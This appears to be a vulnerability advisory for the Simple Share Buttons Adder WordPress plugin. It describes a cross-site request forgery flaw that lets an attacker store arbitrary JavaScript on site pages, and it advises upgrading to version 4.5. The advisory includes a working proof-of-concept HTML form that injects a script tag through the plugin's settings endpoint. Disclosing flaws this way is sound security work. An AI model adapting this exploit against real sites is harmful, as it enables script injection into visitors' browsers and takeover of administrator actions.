CVSS Summary
Score | 6.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | Partial |
Last revised:
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.
Current state: Fixed
Score | 6.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | Partial |
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display on the homepage. (In a real attack the form can be made to auto-submit using Javascript).
<form action="http://scone.local:8000/wp-admin/options-general.php?page=simple-share-buttons-adder" method="POST"> <input type="hidden" name="ssba_options" value="save"> <input type="checkbox" name="ssba_homepage" value="Y"> <input type="text" name="ssba_text_placement" value= "below"> <input type="text" name="ssba_before_or_after" value= "after"> <input type="text" name="ssba_share_text" value="<script>alert('foo')</script>"> <input type="submit"> </form>
Immediately upgrade to version 4.5 or greater.